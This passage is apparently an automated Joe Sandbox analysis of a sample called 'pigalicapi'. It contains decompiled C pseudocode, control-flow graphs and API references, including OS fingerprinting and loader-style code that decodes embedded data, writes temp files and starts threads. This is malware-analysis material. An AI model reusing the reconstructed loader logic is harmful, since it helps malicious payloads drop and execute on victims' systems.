                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1318000056-0
                                                                                                                                                                                                                                                                          • Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                          • Instruction ID: 97f005e152f21f2c2f7fd10924b0caa403664ba6d1ad8a9a516f1bf18f754b30
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B931FBB5E00209EFEB04CF98C494AEEB7B5EF48308F10C169E909A7390D735AA45CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 204 4008f80-4008f94 205 4008f9a-4008f9e 204->205 206 400927b-4009281 204->206 205->206 207 4008fa4-4008fa8 205->207 207->206 208 4008fae-4008fff call 4007d20 * 3 GetVersionExA 207->208 215 4009005-4009016 GetSystemInfo 208->215 216 4009266-400926a 208->216 218 4009115-400911c 215->218 219 400901c-4009023 215->219 216->206 217 400926c-4009275 lstrcatA 216->217 217->206 220 4009210-4009217 call 4009290 218->220 221 4009122-4009129 218->221 222 4009042-4009049 219->222 223 4009025-400903d lstrcatA 219->223 241 4009228-4009237 lstrlenA 220->241 242 4009219-4009222 lstrcatA 220->242 224 4009174-400917b 221->224 225 400912b-4009132 221->225 228 4009068-400906f 222->228 229 400904b-4009063 lstrcatA 222->229 227 4009110 223->227 230 40091c3-40091ca 224->230 231 400917d-4009184 224->231 232 4009134-400914c lstrcatA 225->232 233 400914e-4009155 225->233 227->220 228->227 235 4009075-400907c 228->235 229->227 230->220 238 40091cc-40091d3 230->238 236 40091a0-40091a7 231->236 237 4009186-400919e lstrcatA 231->237 239 400916f 232->239 233->239 240 4009157-4009169 lstrcatA 233->240 243 40090a1-40090ab GetSystemMetrics 235->243 244 400907e-4009085 235->244 246 40091c1 236->246 249 40091a9-40091bb lstrcatA 236->249 237->246 250 40091d5-40091ed lstrcatA 238->250 251 40091ef-40091f6 238->251 239->220 240->239 252 4009259-4009263 lstrlenA 241->252 253 4009239-4009253 lstrcatA * 2 241->253 242->241 247 40090c7-40090d1 GetSystemMetrics 243->247 248 40090ad-40090c5 lstrcatA 243->248 244->243 245 4009087-400909f lstrcatA 244->245 245->227 246->220 254 40090d3-40090eb lstrcatA 247->254 255 40090ed-40090f6 247->255 248->227 249->246 250->220 251->220 256 40091f8-400920a lstrcatA 251->256 252->216 253->252 254->227 255->227 257 40090f8-400910a lstrcatA 255->257 256->220 257->227
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                          				signed int _v50;
                                                                                                                                                                                                                                                                          				signed short _v52;
                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                          					L45:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                          					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                          					E04007D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                          					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                          						L43:
                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L45;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                          					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                          						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                          								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                          									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                          												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                          											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                          											 *_a12 = 8;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                          										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                          										 *_a12 = 9;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                          									 *_a12 = 7;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L38:
                                                                                                                                                                                                                                                                          						if(E04009290() != 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                          							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                          						goto L43;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                          						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                          									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                          										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                          											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                          												 *_a12 = 4;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                          											 *_a12 = 6;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                          										 *_a12 = 5;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                          									 *_a12 = 3;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                          							 *_a12 = 2;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                          						 *_a12 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                          0x04008f89
                                                                                                                                                                                                                                                                          0x04008f94
                                                                                                                                                                                                                                                                          0x0400927b
                                                                                                                                                                                                                                                                          0x04009281
                                                                                                                                                                                                                                                                          0x04008fae
                                                                                                                                                                                                                                                                          0x04008fce
                                                                                                                                                                                                                                                                          0x04008fd6
                                                                                                                                                                                                                                                                          0x04008fe8
                                                                                                                                                                                                                                                                          0x04008fff
                                                                                                                                                                                                                                                                          0x04009266
                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                          0x04009009
                                                                                                                                                                                                                                                                          0x04009016
                                                                                                                                                                                                                                                                          0x0400911c
                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                          0x0400917b
                                                                                                                                                                                                                                                                          0x040091ca
                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                          0x040091f6
                                                                                                                                                                                                                                                                          0x04009201
                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                          0x040091d5
                                                                                                                                                                                                                                                                          0x040091de
                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                          0x0400917d
                                                                                                                                                                                                                                                                          0x04009184
                                                                                                                                                                                                                                                                          0x040091a7
                                                                                                                                                                                                                                                                          0x040091b2
                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                          0x04009186
                                                                                                                                                                                                                                                                          0x0400918f
                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                          0x040091c1
                                                                                                                                                                                                                                                                          0x0400912b
                                                                                                                                                                                                                                                                          0x04009132
                                                                                                                                                                                                                                                                          0x04009155
                                                                                                                                                                                                                                                                          0x04009160
                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                          0x04009134
                                                                                                                                                                                                                                                                          0x0400913d
                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                          0x0400916f
                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                          0x04009210
                                                                                                                                                                                                                                                                          0x04009217
                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                          0x04009237
                                                                                                                                                                                                                                                                          0x04009242
                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                          0x04009023
                                                                                                                                                                                                                                                                          0x04009049
                                                                                                                                                                                                                                                                          0x0400906f
                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                          0x040090ab
                                                                                                                                                                                                                                                                          0x040090d1
                                                                                                                                                                                                                                                                          0x040090f6
                                                                                                                                                                                                                                                                          0x04009101
                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                          0x040090d3
                                                                                                                                                                                                                                                                          0x040090dc
                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                          0x040090ad
                                                                                                                                                                                                                                                                          0x040090b6
                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                          0x04009087
                                                                                                                                                                                                                                                                          0x04009090
                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                          0x0400904b
                                                                                                                                                                                                                                                                          0x04009054
                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                          0x04009025
                                                                                                                                                                                                                                                                          0x0400902e
                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009110

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinXP), ref: 04009054
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Vista), ref: 0400913D
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 04009160
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 0400918F
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win7), ref: 040091B2
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 040091DE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win8), ref: 04009201
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                          • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                          • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                          • Opcode ID: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                          • Instruction ID: 2fdea20511d00b83c143a5217ffb9651c4d2114897e9ccdf2931e29d93762e72
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A81F9B4644209EBFB249F60C849BAE7BB5FB49301F00C659F905BA2C1D779E9C1CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 298 40062b0-40062c4 299 40062ca-40062ce 298->299 300 4006c4e 298->300 299->300 302 40062d4-40062e0 299->302 301 4006c51-4006c54 300->301 302->300 303 40062e6-40062ed 302->303 303->300 304 40062f3-4006314 303->304 306 400631a-400631e 304->306 307 400642e-4006453 304->307 309 4006320-400633a 306->309 310 4006343-4006363 306->310 312 4006459-400645d 307->312 313 4006c2f-4006c36 307->313 309->310 311 400633c-400633e 309->311 314 4006429 310->314 315 4006369-4006375 310->315 311->301 316 4006482-40064a2 312->316 317 400645f-4006479 312->317 318 4006c44 313->318 319 4006c38-4006c42 313->319 314->307 315->314 320 400637b-4006384 315->320 323 40065f3-40065fc 316->323 324 40064a8-40064b4 316->324 317->316 321 400647b-400647d 317->321 318->300 319->300 320->314 322 400638a-4006393 320->322 321->301 322->314 325 4006399-40063a2 322->325 327 4006603-400660f 323->327 328 40065fe 323->328 324->323 326 40064ba-400654c GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 324->326 331 4006410-4006424 call 4001ee0 325->331 332 40063a4-40063ca VirtualAlloc 325->332 326->323 358 4006552-4006586 WriteFile 326->358 329 4006615-4006621 327->329 330 4006bdd-4006be9 327->330 328->327 329->330 334 4006627-4006640 call 4007250 329->334 337 4006c18-4006c24 330->337 338 4006beb-4006bf7 330->338 344 4006427 331->344 335 40063cc-40063e4 call 4006260 332->335 336 400640e 332->336 353 4006642 334->353 354 4006647-400664e 334->354 355 40063e6-40063fa call 4001ee0 335->355 356 40063fd-4006408 VirtualFree 335->356 336->344 345 4006c26 337->345 346 4006c2a 337->346 338->337 343 4006bf9-4006c16 call 400a360 338->343 343->346 344->307 345->346 346->313 353->354 359 4006752-400675b 354->359 360 4006654-4006674 VirtualAlloc 354->360 355->356 356->336 362 4006588-4006591 358->362 363 40065dd-40065e4 358->363 368 4006761-4006788 359->368 369 40069ba-4006a49 GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 359->369 360->359 365 400667a-4006747 call 4007b70 call 40097a0 CreateThread CloseHandle 360->365 362->363 364 4006593-40065c7 CloseHandle call 4006c60 call 4001e60 362->364 363->323 367 40065e6-40065ed CloseHandle 363->367 397 40065d8 call 4006cf0 364->397 398 40065c9-40065d0 call 40074a0 ExitProcess 364->398 365->359 367->323 370 4006858-4006864 call 4002070 368->370 371 400678e-40067c0 VirtualAlloc 368->371 399 4006bd6 369->399 400 4006a4f-4006a75 369->400 385 400686a-4006871 370->385 375 4006856 371->375 376 40067c6-40067e7 call 4006260 371->376 375->385 395 4006842-4006850 VirtualFree 376->395 396 40067e9-4006807 call 4002070 376->396 387 40069b0 385->387 388 4006877-400687e 385->388 387->369 393 4006880-4006891 call 40073c0 388->393 394 4006894-400689d 388->394 393->394 402 40068a3-40068c8 call 40097a0 394->402 403 400698a-4006993 394->403 395->375 396->395 422 4006809-400683a VirtualAlloc call 4007b70 396->422 397->363 399->330 407 4006a7b-4006aad VirtualAlloc 400->407 408 4006b1e-4006b3c WriteFile 400->408 426 40068e9-400690d VirtualAlloc 402->426 427 40068ca-40068e7 402->427 409 4006995-40069a6 call 4002510 403->409 410 40069a9 403->410 416 4006b1c 407->416 417 4006aaf-4006ad0 call 4006260 407->417 412 4006b42-4006b49 408->412 409->410 410->387 419 4006bc9-4006bd0 CloseHandle 412->419 420 4006b4b-4006b57 412->420 416->412 430 4006ad2-4006b02 WriteFile 417->430 431 4006b08-4006b16 VirtualFree 417->431 419->399 420->419 425 4006b59-4006b82 CloseHandle call 4001e60 420->425 434 400683f 422->434 439 4006b84-4006b8b 425->439 440 4006bc7 425->440 433 4006934-400693d 426->433 435 400690f-4006931 call 4007b70 426->435 427->433 430->431 431->416 433->403 438 400693f-4006984 CreateThread CloseHandle 433->438 434->395 435->433 438->403 442 4006ba1-4006baa 439->442 443 4006b8d-4006b9e call 40073c0 439->443 440->399 445 4006bc0 442->445 446 4006bac-4006bbd call 4002510 442->446 443->442 445->440 446->445
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040062B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                          				void _v60;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                          				int _v608;
                                                                                                                                                                                                                                                                          				long _v612;
                                                                                                                                                                                                                                                                          				signed int _v616;
                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                          				void* _v624;
                                                                                                                                                                                                                                                                          				void* _v628;
                                                                                                                                                                                                                                                                          				int _v632;
                                                                                                                                                                                                                                                                          				signed int _v636;
                                                                                                                                                                                                                                                                          				long _v640;
                                                                                                                                                                                                                                                                          				void* _v644;
                                                                                                                                                                                                                                                                          				void* _v648;
                                                                                                                                                                                                                                                                          				void* _v652;
                                                                                                                                                                                                                                                                          				char _v916;
                                                                                                                                                                                                                                                                          				void* _v920;
                                                                                                                                                                                                                                                                          				char _v932;
                                                                                                                                                                                                                                                                          				char _v1196;
                                                                                                                                                                                                                                                                          				long _v1200;
                                                                                                                                                                                                                                                                          				int _v1204;
                                                                                                                                                                                                                                                                          				long _v1208;
                                                                                                                                                                                                                                                                          				void* _v1212;
                                                                                                                                                                                                                                                                          				long _v1216;
                                                                                                                                                                                                                                                                          				signed int _v1220;
                                                                                                                                                                                                                                                                          				void* _v1224;
                                                                                                                                                                                                                                                                          				void* _v1228;
                                                                                                                                                                                                                                                                          				intOrPtr _t317;
                                                                                                                                                                                                                                                                          				signed char _t321;
                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                          				signed int _t340;
                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                          				signed int _t355;
                                                                                                                                                                                                                                                                          				void* _t361;
                                                                                                                                                                                                                                                                          				void* _t368;
                                                                                                                                                                                                                                                                          				void* _t378;
                                                                                                                                                                                                                                                                          				void* _t381;
                                                                                                                                                                                                                                                                          				signed int _t383;
                                                                                                                                                                                                                                                                          				void* _t386;
                                                                                                                                                                                                                                                                          				void* _t393;
                                                                                                                                                                                                                                                                          				int _t415;
                                                                                                                                                                                                                                                                          				signed int _t421;
                                                                                                                                                                                                                                                                          				signed int _t428;
                                                                                                                                                                                                                                                                          				signed char _t433;
                                                                                                                                                                                                                                                                          				void* _t439;
                                                                                                                                                                                                                                                                          				signed char _t442;
                                                                                                                                                                                                                                                                          				void* _t448;
                                                                                                                                                                                                                                                                          				signed int _t452;
                                                                                                                                                                                                                                                                          				intOrPtr _t455;
                                                                                                                                                                                                                                                                          				void* _t465;
                                                                                                                                                                                                                                                                          				void* _t472;
                                                                                                                                                                                                                                                                          				void* _t473;
                                                                                                                                                                                                                                                                          				void* _t508;
                                                                                                                                                                                                                                                                          				void* _t509;
                                                                                                                                                                                                                                                                          				void* _t528;
                                                                                                                                                                                                                                                                          				void* _t529;
                                                                                                                                                                                                                                                                          				void* _t539;
                                                                                                                                                                                                                                                                          				void* _t549;
                                                                                                                                                                                                                                                                          				void* _t550;
                                                                                                                                                                                                                                                                          				void* _t551;
                                                                                                                                                                                                                                                                          				void* _t563;
                                                                                                                                                                                                                                                                          				void* _t598;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L99:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 =  *_a4;
                                                                                                                                                                                                                                                                          					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                          							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                                                                                          								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                          								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									L22:
                                                                                                                                                                                                                                                                          									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                          									__eflags = _t428;
                                                                                                                                                                                                                                                                          									_v24 = _t428;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t508 = _v20;
                                                                                                                                                                                                                                                                          								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                          								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *0x401435d & 0x000000ff;
                                                                                                                                                                                                                                                                          								if(( *0x401435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t509 = _v20;
                                                                                                                                                                                                                                                                          								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          									_t433 = E04001EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                          									L21:
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          								__eflags = _v40;
                                                                                                                                                                                                                                                                          								if(_v40 == 0) {
                                                                                                                                                                                                                                                                          									L19:
                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t439 = E04006260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                          								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                          								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                          									_t442 = E04001EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                          							} else {
